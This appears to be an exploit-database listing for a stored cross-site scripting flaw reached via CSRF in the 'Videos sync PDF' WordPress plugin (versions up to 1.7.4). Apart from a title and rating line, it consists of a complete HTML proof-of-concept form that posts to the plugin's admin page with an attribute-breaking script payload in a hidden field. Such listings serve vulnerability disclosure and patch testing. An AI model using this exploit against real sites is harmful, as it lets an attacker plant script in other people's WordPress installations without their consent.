Exploit for Videos sync PDF <= 1.7.4 - Stored Cross-Site Scripting via CSRF

Name: Exploit for Videos sync PDF <= 1.7.4 - Stored Cross-Site Scripting via CSRF
Rating: 5 (46 reviews)

2022-04-19 | CVSS 0.2

## https://sploitus.com/exploit?id=WPEX-ID:6EAF5123-8F55-4754-859B-8042A16E9FA0
<html>
  <body>
    <form action="http://example.com/wp-admin/admin.php?page=aje_videosyncropdf_videos&p=modifVideo&code=test1test" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="nom" value="Video example" />
      <input type="hidden" name="pdf" value='" autofocus onfocus=alert(/XSS/)//' />
      <input type="hidden" name="mp4" value="video.mp4" />
      <input type="hidden" name="webm" value="video.webm" />
      <input type="hidden" name="ogg" value="" />
      <input type="hidden" name="timers" value="00:00:05->2,
00:00:10->3,
00:00:15->4,
00:00:20->5" />
      <input type="hidden" name="ok" value="Edit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>